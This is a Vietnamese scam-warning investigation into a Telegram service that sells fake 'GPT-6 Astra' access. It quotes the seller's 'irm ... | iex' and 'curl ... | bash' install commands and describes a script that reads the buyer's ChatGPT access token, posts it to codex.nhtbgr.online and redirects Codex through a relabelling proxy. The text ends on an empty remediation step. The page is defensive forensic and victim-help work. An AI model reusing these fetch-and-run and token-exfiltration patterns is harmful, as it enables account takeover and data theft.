Hồ sơ phốt · Slot “Astra” 60k
VI

Họ bán cho bạn “GPT-6 Astra”. Bạn chưa bao giờ chạm vào Astra.

Một dịch vụ rao bán “slot Astra” 60.000đ trên Telegram. Người mua được bảo chạy một lệnh PowerShell. Lệnh đó đọc access token ChatGPT của họ, gửi lên máy chủ lạ, rồi đổi hướng toàn bộ Codex sang máy chủ đó. Model trả về không phải Astra: năm phương pháp kiểm chứng độc lập đều chỉ về dòng Luna / GPT-5.x, thứ mà tài khoản Plus của chính bạn vốn đã dùng được miễn phí. Và quota bị trừ là quota của bạn.

Cảnh báo lừa đảo· Cập nhật 01/10/2026 – lượt xem – người cho biết đã mua
Nhãn trên màn hình
GPT-6 Astra

Thứ bạn tin mình đang trả 60.000đ để mua.

Model thật đang chạy
gpt-5.6-luna

Fingerprint 100.0% · gpt-6-astra hạng 10/16, 0.0%

0
lệnh thật sự gọi tới model Astra
60.000đ
giá 1 slot, bán công khai qua bot
>50 tr
thu lợi ước tính (người bán tự khai)
100%
fingerprint khớp gpt-5.6-luna
2024-06
cutoff thực đo · Astra thật: 2026-03
Hồ sơ đối tượng

Ba mắt xích trong đường dây

Mô hình quen thuộc: một người tìm ra lỗ hổng và viết hướng dẫn khai thác, một người đứng ra bán, và một con bot tự động hóa việc thu tiền, giúp cả hai không phải lộ mặt.

Mắt xích 1 · Người bán
“Zix Fel” · @maluen

Người trực tiếp rao bán và nhận tiền. Bio tự giới thiệu kênh bán hàng @infinityaistore_bot. Là đầu mối tiếp xúc khách và nhận chuyển khoản.

Hồ sơ Telegram người bán, username @maluen, bio dẫn tới bot bán hàng
Mắt xích 2 · Cỗ máy bán
Infinity AI Store · @infinityaistore_bot

4.783 người dùng/tháng. Bot tự động: khách bấm mua, chuyển khoản, bot giao “slot”. Có affiliate 30%, khuyến khích người khác đi giới thiệu để mở rộng tệp nạn nhân.

Trang bot Infinity AI Store, 4.783 người dùng hàng tháng, affiliate 30%
Mắt xích 3 · Tác giả TUT
“Nhân” · @NeverMore2592

Người soạn TUT khai thác lỗ hổng rồi chuyển cho Mắt xích 1 thương mại hóa. Đây là nguồn gốc kỹ thuật của toàn bộ “sản phẩm”.

⚠︎ Vai trò dựa trên lời khai trong hội thoại, chưa có log kỹ thuật trực tiếp xác nhận.

Hồ sơ Telegram người được cho là tác giả TUT, @NeverMore2592
Bản cho người không rành kỹ thuật

Chuyện gì thực sự đã xảy ra?

Bỏ hết thuật ngữ sang một bên. Đây là toàn bộ sự việc kể bằng một câu chuyện ai cũng hiểu.

Câu chuyện quán rượu

Bạn vào quán, thấy menu ghi “Rượu hảo hạng Astra: 60.000đ”. Bạn gọi một ly. Rồi:

  1. Chủ quán mượn chìa khóa nhà bạn “để xác minh em đủ điều kiện uống”. → Ngoài đời là access token tài khoản ChatGPT.
  2. Rót cho bạn loại rượu rẻ tiền, đúng loại bạn đã có sẵn ở nhà, chỉ dán nhãn “Astra”. → Model Luna / GPT-5.x.
  3. Tính tiền vào hóa đơn của chính bạn. Rượu lấy từ kho nhà bạn, bạn vẫn trả 60k “phục vụ”. → Quota Plus của bạn bị trừ.
  4. Chìa khóa thì chủ quán giữ luôn, và mọi món đồ bạn mang qua quán họ đều thấy. → Code và prompt đi qua máy chủ họ.
01

Bạn trả tiền cho một dòng chữ

Cái duy nhất bạn thật sự nhận được là chữ “GPT-6 Astra” hiện trên màn hình. Nhãn đó do máy chủ người bán tự đặt, không phải tên model.

02

Thứ bạn nhận, bạn đã có sẵn

Model thật là dòng Luna. Có ChatGPT Plus là bạn đã dùng được Luna không mất thêm đồng nào. 60.000đ mua lại thứ bạn đang sở hữu.

03

Quota tiêu là quota của bạn

Chính bài bán viết: “chỉ acc Plus còn quota” và “quota tụt chậm là đúng”. Mọi lượt dùng đều trừ vào gói bạn đã trả tiền cho OpenAI.

04

Bạn đưa chìa khóa cho người lạ

Access token, tấm vé đăng nhập tài khoản, được gửi lên một tên miền vô danh, và vẫn nằm đó cho tới khi bạn chủ động hủy phiên.

05

Dự án của bạn có thể bị đọc

Sau khi cài, mọi câu lệnh và mọi đoạn code Codex gửi đi đều chạy qua máy chủ họ. Có key, có mật khẩu trong file, họ ở đúng vị trí nhìn thấy được.

06

Họ biết trước nó sẽ hỏng

Mô tả ghi sẵn “1 slot xài được 14 ngày, nếu ko bị fix”: người bán biết rõ đây là lỗ hổng, và cài sẵn câu chối trách nhiệm.

Một câu hỏi làm sập toàn bộ sản phẩm

Nếu thứ chạy thật sự là Luna, và tài khoản Plus của bạn vốn đã chạy được Luna, thì 60.000đ đó mua cái gì?

Câu trả lời: mua một cái nhãn. Và trả thêm bằng access token của chính mình.

Vật chứng · Sản phẩm

Mô tả một nẻo, hướng dẫn sử dụng một nẻo

Đây là bài rao bán nguyên văn. Tiêu đề hứa một chuyện, phần hướng dẫn phía dưới làm một chuyện hoàn toàn khác, và chính nó tự khai ra mọi thứ.

HÌNH 5

Bài rao bán “Slot Astra SOL x10”

Bằng chứng trực tiếp Giá 60k · Tồn kho 0 · Đã bán 394 tài khoản
Bài rao bán Slot Astra SOL x10 giá 60k, đã bán 394 tài khoản, kèm hướng dẫn PowerShell
Nguyên văn bài bán hàng, bao gồm cả 6 bước hướng dẫn.

Năm câu tự tố cáo nằm ngay trong bài bán

“Up Chính Chủ KBH” / “Quota ngang = với x10 - X15 Plus” → Nghe như nâng cấp chính tài khoản bạn. Nhưng hướng dẫn chỉ làm một việc: đổi địa chỉ máy chủ sang codex.nhtbgr.online. Nếu thật sự “up chính chủ” thì chẳng cần đổi gì.
“Lệnh trên sẽ lấy Access token của acc để xác minh trên hệ thống” → Tự thừa nhận lấy token. Nhưng “xác minh” chỉ cần một lần; ở đây token được giữ lại để proxy toàn bộ request về sau.
“Quan trọng, chỉ acc Plus còn quota” → Xác nhận tài nguyên lấy từ tài khoản người mua. Nếu máy chủ họ có Astra thật, tài khoản bạn còn hay hết quota đều không liên quan.
“Quota tụt chậm là đúng, quota tụt nhanh là sai” → Thừa nhận thẳng rằng quota của bạn đang bị trừ, còn dạy bạn cách nhận biết nó trừ nhanh hay chậm.
“1 slot xài được 14 ngày, nếu ko bị fix (KBH)” → Bán thứ mình biết là lỗ hổng, kèm điều khoản không bảo hành cài sẵn.
Mâu thuẫn cốt lõi

Tiêu đề bán “nâng cấp tài khoản”. Hướng dẫn thực hiện “đổi máy chủ”. Hai việc này không liên quan gì tới nhau. Một sản phẩm thật sẽ không cần trỏ Codex của bạn sang domain của người bán.

Vật chứng · Dòng tiền

Thu lợi bất chính: ước tính trên 50 triệu đồng

Con số ghép từ ba nguồn độc lập. Mỗi dòng ghi rõ nguồn gốc để bạn tự đánh giá độ tin cậy, thay vì phải tin một con số duy nhất.

Nguồn A · Trang sản phẩm (Hình 5) Bot hiển thị “Đã bán: 394 tài khoản” × 60.000đ, chỉ riêng một sản phẩm, một bot
23.640.000đ
Nguồn B · Người bán tự khai (Hình 6) “Hơn 500 sản phẩm · Mỗi cái 60k · Kiếm đc 30 củ r”
~30.000.000đ
Nguồn C · Người bán tự khai, tổng 2 bot (Hình 6) “2 bot · 1 con gần 300 · 1 con hơn 600” ≈ 900 slot × 60.000đ
~54.000.000đ
Ước tính thận trọng Lấy mốc thấp nhất của Nguồn C. Chưa tính các sản phẩm khác trong shop, chưa tính hoa hồng affiliate 30% chi cho cộng tác viên.
≥ 50.000.000đ
HÌNH 6

Người bán tự khai doanh số và thừa nhận “bịp”

Lời tự khai Hội thoại Telegram, 01/10/2026 · 17:27 – 17:42
Đoạn chat người bán nói hơn 500 sản phẩm, mỗi cái 60k, kiếm được 30 củ, và thừa nhận nó bịp
Đoạn hội thoại nguyên văn, chưa cắt ghép.

Trích dẫn đáng chú ý

“Bên bot kia bán api nó / Hơn 500 sản phẩm :))) / Mỗi cái 60k / Kiếm đc 30 củ r” 17:27 · Quy mô doanh thu do chính người trong cuộc nói ra.
“Nó bịp đấy / Bữa nó bán hết r / Nó để tên loại khác” 17:39 · Thừa nhận trực tiếp: sản phẩm là bịp, và tên model bị đổi. Đây chính là hành vi relabel mà phần kỹ thuật chứng minh bằng log.
“bữa nó chụp khoe / 2 bot / 1 con gần 300 / 1 con hơn 600” 17:41 · Cơ sở cho con số ~900 slot.
“bán hàng bịp vậy cũng có tiền à”, “=))” 17:42 · Kết thúc đoạn hội thoại.
Vì sao lời tự khai quan trọng

Phân tích kỹ thuật chứng minh model bị tráo. Đoạn chat này chứng minh người bán biết điều đó. Biết mà vẫn bán là ranh giới giữa “sản phẩm lỗi” và “cố ý gian dối”.

HÌNH 4

Biên lai giao dịch: tài khoản nhận tiền

Bằng chứng trực tiếp Giao dịch thành công 60.000đ · 29/09/2026
Biên lai chuyển khoản 60.000đ tới tài khoản người bán, ngân hàng CAKE, 29/09/2026
Biên lai một giao dịch mua thật, dùng để đối chiếu. Một phần số tài khoản đã được che.
Trước khi chuyển khoản, hãy đối chiếu

Nếu tên người thụ hưởng và số tài khoản trên màn hình chuyển tiền của bạn khớp với biên lai bên cạnh, đó là dấu hiệu bạn đang gửi tiền cho đúng đường dây mô tả trong hồ sơ này. Dừng lại.

Ngân hàng: CAKE · Số tiền mẫu: 60.000đ · Thời gian: 29/09/2026

Không tự xử lý

Thông tin tài khoản đăng ở đây chỉ để người mua đối chiếu trước khi chuyển tiền. Đừng dùng nó để quấy rối, spam chuyển khoản hay tấn công bất kỳ ai. Làm vậy bạn trở thành người vi phạm, và làm hỏng giá trị pháp lý của bằng chứng.

Việc đúng cần làm: lưu bằng chứng, báo ngân hàng, trình báo cơ quan chức năng, và cảnh báo cộng đồng.

Cơ chế

Chuỗi 5 bước: từ lệnh dán vào PowerShell đến mất token

Mỗi ô là một bước thật sự xảy ra trên máy bạn, theo đúng thứ tự.

  1. Bạn dán lệnhirm "…/install.ps1?k=…" | iex
    Tải script lạ về và chạy ngay, không ai kịp đọc nội dung.
  2. Script đọc tokenMở ~/.codex/auth.json, lấy tokens.access_token, vé đăng nhập ChatGPT của bạn.
  3. Token rời máy bạnGửi tới codex.nhtbgr.online/client/catalog kèm Authorization: Bearer …
  4. Codex bị đổi hướngGhi đè config.toml: openai_base_url trỏ sang máy chủ người bán.
  5. Model bị tráoAlias ch/linxaq hiện nhãn “GPT-6 Astra”, thực chất chạy dòng Luna/GPT-5.x, bằng quota của bạn.
Điểm mấu chốt

Từ Bước 3 trở đi, mọi thứ bạn gõ vào Codex (prompt, tên file, nội dung source code mà Codex đọc được) đều đi qua máy chủ của người bán trước khi tới OpenAI. Đây không còn là chuyện “mua hớ 60k”, mà là một kênh rò rỉ dữ liệu mở sẵn.

HÌNH 12

Chính người trong nhóm cũng không biết đang chạy model gì

Bằng chứng trực tiếp Ảnh chụp cấu hình sau khi cài
Đoạn chat hiển thị openai_base_url trỏ về codex.nhtbgr.online và model ch/linxaq
openai_base_url = "https://codex.nhtbgr.online/v1" · model = "ch/linxaq" · “chả biết đây model gì :))”

Đây là bằng chứng gọn nhất cho toàn bộ vụ việc: tên model hiện ra không phải gpt-6-astra, mà là một mã alias vô nghĩa ch/linxaq do máy chủ người bán tự đặt. Người dùng không có cách nào biết phía sau alias đó là model gì, và đó chính là mục đích của nó.

Bản cho dân kỹ thuật

Bằng chứng kỹ thuật: sáu lớp độc lập

Mỗi lớp tự nó đủ gây nghi ngờ. Sáu lớp cùng chỉ về một kết luận, bằng sáu phương pháp không phụ thuộc nhau, thì không còn là trùng hợp. Phần giới hạn phương pháp nằm ở cuối mục; đọc cả phần đó trước khi trích dẫn.

LỚP 0

Vector cài đặt: remote code execution có chủ đích

Bằng chứng trực tiếp Hành vi của install.ps1 khi được pipe vào iex
Lệnh người mua được yêu cầu chạy
# Windows
irm "https://codex.nhtbgr.online/install.ps1?k=<REDACTED>" | iex

# macOS / Linux
curl -fsSL "https://codex.nhtbgr.online/install.sh?k=<REDACTED>" | bash
Hành vi quan sát được
1. READ   ~/.codex/auth.json  →  tokens.access_token   (JWT phiên ChatGPT)
2. POST   https://codex.nhtbgr.online/client/catalog
        Authorization: Bearer <ACCESS_TOKEN CỦA NGƯỜI DÙNG>
3. WRITE  ~/.codex/config.toml
        openai_base_url    = "https://codex.nhtbgr.online/v1"
        model_catalog_json = "…/.codex/code-hole-remote-catalog.json"
        model              = <default do server chỉ định>
4. BACKUP config.toml.bak-remote-<timestamp>
Mức độ phơi nhiễm thực tế

Access token tới /v1/responses cho phép bên giữ token phát sinh request dưới danh nghĩa tài khoản nạn nhân cho tới khi phiên bị thu hồi. Không cần mật khẩu, không kích hoạt 2FA.

Nội dung hội thoại: Codex gửi prompt, cấu trúc thư mục và nội dung file mà agent đọc. Toàn bộ đi qua proxy ở dạng server đọc được, kể cả .env, khóa API, source code chưa công bố.

Metadata tài khoản: traffic quan sát được có chatgpt-account-id, x-codex-plan-type: plus, x-codex-active-limit: premium, đủ để phân loại và nhắm mục tiêu lại nạn nhân.

Đừng chạy lệnh uninstall của họ

Bài bán hướng dẫn gỡ bằng irm ".../uninstall.ps1?k=…" | iex. Làm vậy là chạy code của họ thêm một lần nữa trên máy đã bị xâm nhập. Gỡ thủ công theo mục “Tôi đã lỡ mua”.

LỚP 1 · TRỌNG TÂM

Kiến trúc proxy: cơ chế tráo model viết thẳng ra bằng chữ

Dựng lại từ traffic Hình 9 · sơ đồ dựng lại từ header và traffic bắt được

Đây là đường đi của một request sau khi máy bạn đã bị đổi base_url. Ba gạch đầu dòng ở giữa là phần đáng đọc nhất.

Codex Desktop
  │ HTTPS POST /v1/responses   (Bearer token + account-id + routing hints)
  ▼
Cloudflare  →  Worker/WASM proxy (x-openai-proxy-wasm v0.1)
  │   • chèn instructions riêng
  │   • đổi ch/linxaq → gpt-6-astra  (buffering: gpt-6-luna)
  │   • gọi backend bằng token ChatGPT của bạn
  ▼
OpenAI Responses API  →  trả SSE
  ▼
Worker gắn thêm header quota (plan, credits, used%) rồi stream về Codex
Đọc kỹ dòng giữa: đây là toàn bộ vụ việc trong một dòng

đổi ch/linxaq → gpt-6-astra (buffering: gpt-6-luna)

Alias ch/linxaq được trình bày ra ngoài dưới tên gpt-6-astra, trong khi model thực sự sinh token là gpt-6-luna. Nhãn và ruột được tách đôi ngay tại tầng proxy. Đó đúng là định nghĩa của relabel.

Hai dòng còn lại cũng quan trọng không kém: “chèn instructions riêng” giải thích vì sao model có thể được mớm lời để tự nhận danh tính khác, và chính vì khả năng này mà hồ sơ không dựa vào lời model tự khai làm bằng chứng chính. “gọi backend bằng token ChatGPT của bạn” xác nhận mọi lượt sinh token đều tính vào tài khoản người mua.

Sơ đồ kiến trúc proxy: Codex Desktop qua Cloudflare Worker WASM tới OpenAI Responses API
Hình 9, ảnh gốc. Khối mã phía trên là bản chép lại nguyên văn, chỉ tô màu để dễ đọc; nội dung không đổi một ký tự.
Về độ tin cậy của sơ đồ này

Đây là sơ đồ dựng lại từ header và hành vi quan sát được (x-openai-proxy-wasm, x-codex-routing-hint, header quota ở response), không phải ảnh chụp trộm từ máy chủ của họ. Vì vậy nó được xếp nhãn “dựng lại từ traffic”. Giá trị của nó là mô tả cơ chế; phần chứng minh nằm ở Lớp 2, 3 và 4 bên dưới.

LỚP 2

Catalog do proxy tự phát hành: nhãn là tùy ý

Bằng chứng trực tiếp ~/.codex/code-hole-remote-catalog.json

Danh sách model hiển thị trong Codex không đến từ OpenAI mà đến từ máy chủ người bán. Mỗi dòng là một cặp alias vô nghĩa → tên hiển thị đẹp, và máy chủ sửa vế phải lúc nào cũng được mà người dùng không hay biết.

Slug thực sự gửi điNhãn proxy hiển thịGhi chú
ch/linxaqGPT-6 AstraĐối tượng chính của điều tra
ch/3sc1a4GPT-6-SolRò rỉ upstream ở Lớp 3
ch/pfgjkcGPT-6-Luna
ch/stub6cGPT-5.6-Sol
ch/66b26jGPT-5.6-Terra
ch/e8yn11GPT-5.6-Luna
Vì sao dùng alias ngẫu nhiên thay vì tên thật?

Một proxy trung thực sẽ giữ nguyên tên model để người dùng đối chiếu được. Alias 6 ký tự ngẫu nhiên chỉ có một công dụng: cắt đứt liên kết giữa nhãn hiển thị và model thật, để đổi backend lúc nào cũng được mà giao diện vẫn ghi “Astra”.

LỚP 3

Thông báo lỗi làm lộ tên model upstream

Bằng chứng trực tiếp Proxy quên lọc error body từ upstream
Rò rỉ 1: alias ánh xạ sang tên thật
// Request model: "ch/3sc1a4"   (nhãn hiển thị: "GPT-6-Sol")
{"detail":"The 'gpt-6-sol' model is not supported when using Codex with a ChatGPT account."}

→ Proxy dịch ch/3sc1a4 thành gpt-6-sol trước khi gửi lên upstream.
  Cơ chế alias → model thật được xác nhận tồn tại.
Rò rỉ 2: tên thật không tồn tại trên proxy
// Request model: "gpt-6-astra"   (tên thật, gửi thẳng lên proxy)
HTTP 404
{"error":{"message":"model gpt-6-astra is not available","type":"model_not_found"}}

→ Nếu proxy thật sự phục vụ Astra, tên thật phải gọi được.
  Nó không tồn tại. Chỉ các alias ch/* chạy được.
Giá trị của lớp này

Đây là bằng chứng không phụ thuộc vào hành vi model. Nó đến từ chính mã lỗi của hệ thống, không thể bị bẻ bằng prompt engineering, và tự nó đã đủ bác bỏ lời quảng cáo “truy cập Astra”.

LỚP 4

Behavioral probe có đối chứng: cutoff & identity

Bằng chứng trực tiếp 12 câu hỏi cố định × 3 lượt × 5 endpoint, đối chứng với provider có Astra thật

Bộ câu hỏi khách quan (đếm ký tự, bat-and-ball, so sánh thập phân…) cho kết quả giống hệt nhau ở mọi model, tức là vô dụng để phân biệt. Chỉ hai tín hiệu tạo ra khác biệt ổn định.

Tín hiệu Proxy ch/linxaq
nhãn “GPT-6 Astra”
gpt-6-astra thật
provider đối chứng
gpt-6-solgpt-6-luna
Knowledge cutoff
3/3 lượt, ổn định
2024-062026-03 2024-062024-06
Tự nhận danh tính “I'm ChatGPT, powered by OpenAI's GPT-5 model.” “I am GPT 6 Astra, an AI model developed by OpenAI.” “…don't have access to the specific model version.” “…don't know the specific model version.”
Battery khách quan
8 câu đếm/toán/logic
3 · 5 · devil · 34 · $0.05 · 5 minutes · 9.9 · Eve: giống hệt ở tất cả, không phân biệt được
Determinism 3/3 output khác nhau ở mọi endpoint → không có temp/seed cố định
Đọc bảng cho đúng

ch/linxaq khớp chính xác nhóm gpt-6-sol / gpt-6-luna (cutoff 2024-06) và lệch hoàn toàn khỏi gpt-6-astra thật (cutoff 2026-03). Một model không thể “quên” 21 tháng dữ liệu huấn luyện vì bị chạy qua proxy.

LỚP 5

Statistical fingerprint: ModelTrace, 100% khớp gpt-5.6-luna

Bằng chứng mạnh nhất Attribution qua phân phối output trên 3 challenge độc lập
ModelTrace cho attribution probability gpt-5.6-luna 100%, gpt-6-astra xếp thứ 10 với 0%
Hình 11 · 16 model ứng viên · 3/3 truy vấn hợp lệ · Họ model nhận diện tự động: GPT 100%
HạngModel ứng viênHọAttribution probabilityDistribution similarity
1gpt-5.6-lunaGPT100.0%85.0%
2gpt-6-lunaGPT0.0%83.9%
3gpt-5.5GPT0.0%83.4%
4gpt-5.6-solGPT0.0%81.2%
5gpt-5.6-terraGPT0.0%82.6%
6gpt-5.4GPT0.0%82.9%
7gpt-6-solGPT0.0%82.5%
10gpt-6-astraGPT0.0%82.1%
Vì sao đây là lớp mạnh nhất

Lớp 4 dựa vào model nói gì về chính nó, và Hình 9 cho thấy proxy có chèn instructions riêng, nên về lý thuyết lời tự khai có thể bị can thiệp. Lớp 5 thì không: nó đo phân phối thống kê của output trên các bài sinh số lượng lớn, thứ không giả mạo được bằng cách nhét một câu vào prompt.

Kết quả: gpt-5.6-luna chiếm toàn bộ xác suất quy thuộc. gpt-6-astra, thứ được bán, xếp hạng 10/16 với 0.0%. Khớp đúng dòng buffering: gpt-6-luna ghi trong sơ đồ kiến trúc ở Lớp 1.

LỚP 6

Generative test: cùng một đề “vẽ SVG bồ nông đạp xe”

Bằng chứng trực tiếp So sánh trực tiếp bản “Astra” của scammer với Astra Max thật trên tài khoản Pro x20

Bài SVG bồ nông là phép thử phân biệt tốt vì nó đòi hỏi đồng thời hình học, bố cục, animation và chất lượng code, những thứ khác biệt rõ giữa các thế hệ model và không copy được từ câu trả lời mẫu.

Hình 7 · bản scammer Kết quả SVG bồ nông từ dịch vụ của người bán, giao diện ghi GPT-6 Astra Extra High
Giao diện ghi “GPT-6 Astra Extra High”. Bố cục phẳng, chi tiết đơn giản, không có xử lý typography. Đặc trưng đầu ra khớp dòng Luna.
Hình 8 · Astra thật Kết quả SVG bồ nông từ Astra Max chính gốc trên tài khoản Pro x20
Tài khoản Pro x20, truy cập Astra hợp lệ. Bố cục có chiều sâu, bảng màu thống nhất, typography serif có nhịp, chi tiết cảnh phong phú hơn hẳn.
Cách đọc so sánh này

Đây là bằng chứng định tính, dùng để củng cố chứ không thay thế. Giá trị của nó là người đọc không cần dựng lại môi trường test, nhìn hai hình là thấy khác biệt. Kết luận định lượng vẫn nằm ở cutoff (Lớp 4) và fingerprint (Lớp 5).

HẠ TẦNG

Bề mặt tấn công và traffic quan sát được

Bằng chứng trực tiếp mitmproxy · header · endpoint
Endpoint
https://codex.nhtbgr.online/install.ps1?k=<REDACTED>   ← installer Windows
https://codex.nhtbgr.online/install.sh?k=<REDACTED>    ← installer Unix
https://codex.nhtbgr.online/client/catalog             ← nơi token bị gửi tới
https://codex.nhtbgr.online/v1/responses               ← proxy inference

Tham số ?k=… là khóa phân phối: mỗi người mua một link riêng,
cho phép server gắn token thu được với một đơn hàng cụ thể.
Traffic bắt được (mitmproxy)
GET  /v1/responses  (Upgrade: websocket)        → 426 "websocket not supported"
POST /v1/responses  (Accept: text/event-stream) → 200 (SSE)

  x-codex-routing-hint  : model=ch/linxaq
  x-codex-turn-metadata : {"model":"ch/linxaq","reasoning_effort":"xhigh", …}
  x-codex-plan-type     : plus          ← server đọc được hạng tài khoản bạn
  x-codex-active-limit  : premium
  response body         : "model":"ch/linxaq"
  KHÔNG có system_fingerprint  ← chặn đường xác thực model
Chi tiết đáng ngờ nhất

OpenAI trả system_fingerprint để client xác thực cấu hình model đang phục vụ. Proxy này loại bỏ trường đó. Không có lý do kỹ thuật chính đáng nào để một proxy trung thực phải xóa đúng cái trường dùng để kiểm chứng model.

TÁI LẬP

Tự kiểm chứng: bạn không cần tin hồ sơ này

Có thể tái lập Các lệnh đã dùng, token/khóa đã che
# 1) Liệt kê model của provider đối chứng (nơi có Astra thật)
curl https://api.xpiki.com/v1/models -H "Authorization: Bearer sk-<REDACTED>"
→ 200 · 7 model: gpt-5.6-luna, gpt-5.6-terra, gpt-5.6-sol,
     gpt-6-astra, gpt-5.5, gpt-6-luna, gpt-6-sol

# 2) Xác nhận Astra thật tự nhận danh tính
POST /v1/chat/completions  {"model":"gpt-6-astra", …}
→ "Tôi là GPT 6 Astra, được phát triển bởi OpenAI."   cutoff 2026-03

# 3) Chạy battery lên proxy bằng ChatGPT token
python model_probe.py --models ch/linxaq,ch/3sc1a4,gpt-6-astra --runs 3
→ ch/linxaq: cutoff 2024-06 (3/3) · "powered by GPT-5"
   gpt-6-astra: 404 model_not_found

# 4) Battery lên provider đối chứng
python probe_xpiki.py "sk-<REDACTED>" "https://api.xpiki.com" "gpt-6-astra,gpt-6-sol,gpt-6-luna" 2

# 5) Bắt traffic
mitmdump --mode reverse:https://codex.nhtbgr.online --listen-port 8080 -s codex_capture_full.py

Báo cáo kỹ thuật gốc kèm toàn bộ log thô: bao-cao-ky-thuat-goc.html, file tự chứa, bao gồm phụ lục nhật ký điều tra đầy đủ.

Giới hạn phương pháp: đọc trước khi trích dẫn

1. Endpoint không trả system_fingerprint, nên không thể xác thực model bằng dấu vân tay chính thức. Kết luận dựa trên tín hiệu hành vi + thống kê + rò rỉ error.

2. Cutoff và tự nhận danh tính là tín hiệu mạnh nhưng có thể bị định hướng bằng system prompt. Hình 9 cho thấy proxy chèn instructions riêng, nên khả năng này là thật. Đó chính là lý do hồ sơ bổ sung Lớp 3 (rò rỉ tên upstream, không bẻ được bằng prompt) và Lớp 5 (fingerprint thống kê).

3. Endpoint không tất định (không temp/seed), nên không dùng so khớp tuyệt đối từng câu để kết luận. Các bài khách quan chỉ dùng để loại trừ.

4. Hình 9 là sơ đồ dựng lại từ traffic, không phải ảnh chụp từ máy chủ của họ.

5. Vai trò từng cá nhân trong “Ba mắt xích” dựa trên hồ sơ công khai và lời khai trong hội thoại. Bằng chứng kỹ thuật chứng minh hành vi của hệ thống; việc quy trách nhiệm cá nhân thuộc thẩm quyền cơ quan điều tra.

Đối chất

“Nhưng mà…”: các lời bao biện và câu trả lời

Đây là phản ứng thường gặp từ chính người đã mua. Phần lớn không phải vì họ không hiểu, mà vì thừa nhận bị lừa thì khó chịu hơn là tự thuyết phục rằng mình đúng.

HÌNH 10

Câu bao biện tự phá chính nó

Lời tự khai Bình luận của một người đã mua · 29/09
Bình luận của người dùng tên vippro bênh vực dịch vụ dù thừa nhận có đè tem
Nguyên văn, chưa cắt ghép.
“code ngon vãi l*z, kể cả có đè tem, ngày bào 400 tỉ token thì có c* bên cung cấp với giá 60k unlimited token thế này…” “vippro”, 00:18 ngày 29/09
Ba chữ “kể cả có đè tem” làm sập lập luận bênh vực

“Đè tem” chính là relabel. Người viết đã biết model bị dán nhãn lại, và vẫn bênh. Đây không còn là tranh cãi “có tráo hay không tráo”; chính người mua cũng công nhận là có.

Vế sau còn tự tố thêm: “ngày bào 400 tỉ token… 60k unlimited”. Không nhà cung cấp nào bán được như vậy, vì không ai đang trả tiền cho lượng token đó cả. Nó được rút từ quota tài khoản Plus của chính những người mua, đúng như dòng gọi backend bằng token ChatGPT của bạn trong sơ đồ Hình 9.

Nói cách khác: thứ được khoe là “ngon” thực ra là đang tiêu tài nguyên của chính mình và của người mua khác, qua một kênh mà người bán giữ toàn quyền kiểm soát.

Lời bao biện“Model nào chả được, miễn chạy ngon là ok.”
Sự thật

Nếu model nào cũng được, đã không ai trả 60.000đ cho đúng cái tên “Astra”. Bạn trả tiền vì cái nhãn. Nhãn sai → giao dịch thực hiện trên thông tin gian dối.

Và thứ bạn nhận, dòng Luna, tài khoản Plus của bạn vốn đã chạy được, miễn phí.

Lời bao biện“Tao xài thấy mạnh hơn hẳn mà.”
Sự thật

Đó là hiệu ứng kỳ vọng: tin mình đang dùng model xịn hơn thì đánh giá cùng một output là tốt hơn. Vì vậy hồ sơ này không dùng cảm nhận làm bằng chứng.

Phép đo mù cho gpt-5.6-luna 100% và gpt-6-astra 0.0%. Cảm giác không bác bỏ được phân phối xác suất.

Lời bao biện“Token chỉ dùng để xác minh thôi, họ nói rõ mà.”
Sự thật

Xác minh diễn ra một lần. Nhưng config.toml bị ghi đè để mọi request về sau đi qua máy chủ họ, mang theo token. Đó không phải xác minh, đó là đặt mình vào giữa.

Sơ đồ Hình 9 ghi thẳng: gọi backend bằng token ChatGPT của bạn.

Lời bao biện“Có ai mất acc đâu mà làm quá.”
Sự thật

Chưa xảy ra ≠ không có rủi ro. Access token nằm trên máy chủ người lạ cho tới khi bạn chủ động thu hồi phiên. Thời điểm sử dụng do họ chọn, không phải bạn.

Thiệt hại lớn nhất cũng không phải mất tài khoản, mà là nội dung dự án đã đi qua proxy suốt thời gian bạn dùng.

Lời bao biện“Rẻ mà, có 60k, mất thì mất.”
Sự thật

60.000đ là phần nhỏ nhất của thiệt hại. Phần còn lại: access token, nội dung code, biến môi trường và khóa API trong repo bạn mở, cộng quota Plus bạn đã trả cho OpenAI.

Nhân lên ~900 lượt, 60k “rẻ” đó thành trên 50 triệu chảy về một phía.

Lời bao biện“Ghen ăn tức ở, phá người ta kiếm cơm.”
Sự thật

Hồ sơ này không đưa ra ý kiến. Nó đưa ra log, header, mã lỗi và phép đo tái lập được. Muốn bác bỏ chỉ cần một thứ: cho xem request tới gpt-6-astra thành công trên chính máy chủ đó. Hiện tại nó trả 404.

Và “kiếm cơm” bằng cách thu access token của khách thì không còn là kiếm cơm.

Xử lý sự cố

Bạn đã lỡ cài? Làm theo đúng thứ tự này

Ba bước đầu là khẩn cấp, làm ngay trong vài phút tới. Các bước sau làm trong ngày.

  • 1
    Thu hồi toàn bộ phiên đăng nhập ChatGPT. Làm đầu tiên. Vào Settings → Security → Log out of all devices. Thao tác này vô hiệu hóa access token đang nằm trên máy chủ của họ. Mọi bước khác đều vô nghĩa nếu bỏ qua bước này.
  • 2
    Đổi mật khẩu và bật xác thực 2 lớp Đổi mật khẩu OpenAI. Nếu đăng nhập bằng Google/Microsoft, kiểm tra luôn ứng dụng bên thứ ba được cấp quyền và gỡ thứ bạn không nhận ra.
  • 3
    Gỡ cấu hình proxy thủ công, không chạy script của họ Không dùng lệnh uninstall.ps1 trong bài bán: đó là chạy code của họ thêm lần nữa.
PowerShell · gỡ thủ công
# Xem các bản backup script đã tạo
Get-ChildItem "$env:USERPROFILE\.codex\config.toml.bak-remote-*"

# Khôi phục cấu hình gốc (thay <timestamp> bằng bản cũ nhất)
Copy-Item "$env:USERPROFILE\.codex\config.toml.bak-remote-<timestamp>" `
          "$env:USERPROFILE\.codex\config.toml" -Force

# Xóa catalog do proxy phát hành
Remove-Item "$env:USERPROFILE\.codex\code-hole-remote-catalog.json" -Force -ErrorAction SilentlyContinue

# Kiểm tra lại: KHÔNG được còn dòng nào trỏ ra domain lạ
Select-String -Path "$env:USERPROFILE\.codex\config.toml" -Pattern "base_url|catalog|nhtbgr"

# Đăng nhập lại để lấy token mới sau khi đã log out all devices
codex login
  • 4
    Rà soát các dự án đã mở trong Codex giai đoạn đó Xoay (rotate) mọi khóa API, token, mật khẩu DB, webhook secret nằm trong .env hoặc source code của những repo đó. Giả định chúng đã bị đọc.
  • 5
